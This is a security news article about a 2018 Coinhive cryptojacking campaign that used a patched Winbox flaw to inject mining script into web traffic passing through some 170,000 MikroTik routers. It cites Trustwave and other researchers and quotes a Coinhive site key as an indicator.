Massive Coinhive cryptojacking campaign infects 170,000 MikroTik routers.
What is MikroTik?
According to the official website, MikroTik is a Latvian company which was founded in 1996. Th purpose of it was to develop routers and ISP systems. MikroTik now provides hardware and software for Internet Connectivity in most of the countries around the world. RouterOS is the operating system of most MikroTik devices.
Now recently, security researchers have unraveled a massive cryptojacking campaign that targets and infects MikroTik routers with a copy of the Coinhive in-browser cryptocurrency mining script.
The campaign appears to have seen this week and was, in its first stages which were mainly active in Brazil. But later on, they started targeting MikroTik routers all over the world.
The first to spot the attacks was a Brazilian researcher, who goes by the name of MalwareHunterBR on Twitter. But as the campaign got bigger and bigger by infecting more and more routers, it also got the attention of Simon Kenin, a security researcher with Trustwave’s SpiderLabs division.
— MalwareHunterBR (@MalwareHunterBR) July 30, 2018
In a report, Trustwave’s security researcher, Kenin says that the hacker (or hackers) behind this campaign appear to have compromised around 72,000 MikroTik routers in Brazil during the first stages of their attack.
Kenin says the attacker uses a zero-day in the Winbox component of MikroTik routers that was discovered in April. MikroTik patched the zero-day in less than a day, back in April, but this didn’t necessarily mean that router owners applied the required patch.
Instead, the former zero-day was dissected by security researchers and public proof-of-concept (PoC) code has appeared in several places on GitHub.
Using of April 2018 MikroTik zero-day
According to Kenin, the attacker used one of those PoCs to alter traffic passing through the MikroTik router. Thereby injecting a copy of the Coinhive library inside all the pages served through the router.
We know it’s only one threat actor exploiting this flaw because the attacker used only one Coinhive key for all the Coinhive injections he performed during the past week.
Furthermore, Kenin says that he also identified some cases where non-MikroTik users were also impacted. He says this was happening because some Brazilian ISPs were using MikroTik routers for their main network, and hence the attacker managed to inject the malicious Coinhive code in a massive amount of web traffic.
In addition, Kenin says that because of the way the attack was performed, the injection worked both ways, and not necessarily only for traffic going to the user. For example, if a website was hosted on a local network behind an affected MikroTik router, traffic to that website would also be injected with the Coinhive library.
Hacker became more careful, shrunk operation
But injecting Coinhive in so much traffic is very noisy and tends to annoy users, which could lead to users and ISPs investigating the source of the problem.
The attacker also appears to have understood this issue. Kenin says that in recent attacks, the hacker switched tactics and only injected the Coinhive script in error pages returned by the routers.
But shrinking his attack surface doesn’t look to be a downgrade for the attacker. The Trustwave researcher says that the attack is spreading outside Brazil and now it has doubled the initial numbers, having infected over 170,000 MikroTik routers.
“Let me emphasize how bad this attack is,” Kenin says. “There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens, if not hundreds of users daily.”
“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end-user computers, they would go straight to the source; carrier-grade router devices,” he added.
“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”
Security researcher Troy Mursch told, he discovered a second Coinhive key being injected in the traffic of MikroTik routers. This campaign has touched over 25,000 routers, bringing the total at over 200,000, as the first Coinhive key was now used on over 175,000 devices. It is unclear if this second campaign is being orchestrated by another hacker, or by the same threat actor who switched to a new key after Trustwave exposed his first operation.
Coinhive site key "oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4" is used in another #cryptojacking campaign targeting MikroTik routers. In this case, over 25,000 affected hosts are found on @censysio
— Bad Packets Report (@bad_packets) August 2, 2018